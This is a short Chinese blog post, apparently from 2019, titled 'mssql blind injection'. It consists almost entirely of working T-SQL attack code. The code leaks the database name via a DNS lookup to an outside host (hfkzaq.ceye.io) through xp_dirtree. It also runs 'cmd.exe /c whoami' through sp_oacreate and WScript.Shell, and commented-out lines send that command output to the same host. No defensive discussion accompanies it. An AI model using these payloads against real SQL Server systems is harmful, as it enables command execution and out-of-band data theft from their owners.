mssql 无回显 注入

作者: print("") 分类: 信息安全 发布时间: 2019-06-13 14:44

DECLARE @host varchar(128);
SELECT @host=(select db_name())+ '.hfkzaq.ceye.io';
select @host;
EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');

declare @luan int,@exec int,@text int,@str varchar(8000);
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output;
 
--exec sp_oamethod @luan,'run',null,'calc.exe';
 
exec sp_oamethod @luan,'exec',@exec output,'c:\windows\system32\cmd.exe /c whoami';
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'readall', @str out
select @str+'1';

--DECLARE @host varchar(128);
--SELECT @host=@str+'.hfkzaq.ceye.io';
--DECLARE @ho2st varchar(128);
--select @ho2st=Replace(@host,' ','');
--SELECT @ho2st;

--EXEC('master..xp_dirtree "\\'+@host +'\foobar$"');

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

1
说点什么

avatar
1 Comment threads
0 Thread replies
0 Followers
 
Most reacted comment
Hottest comment thread
1 Comment authors
life Recent comment authors
  Subscribe  
最新 最旧 得票最多
提醒
life
游客
life

lifelife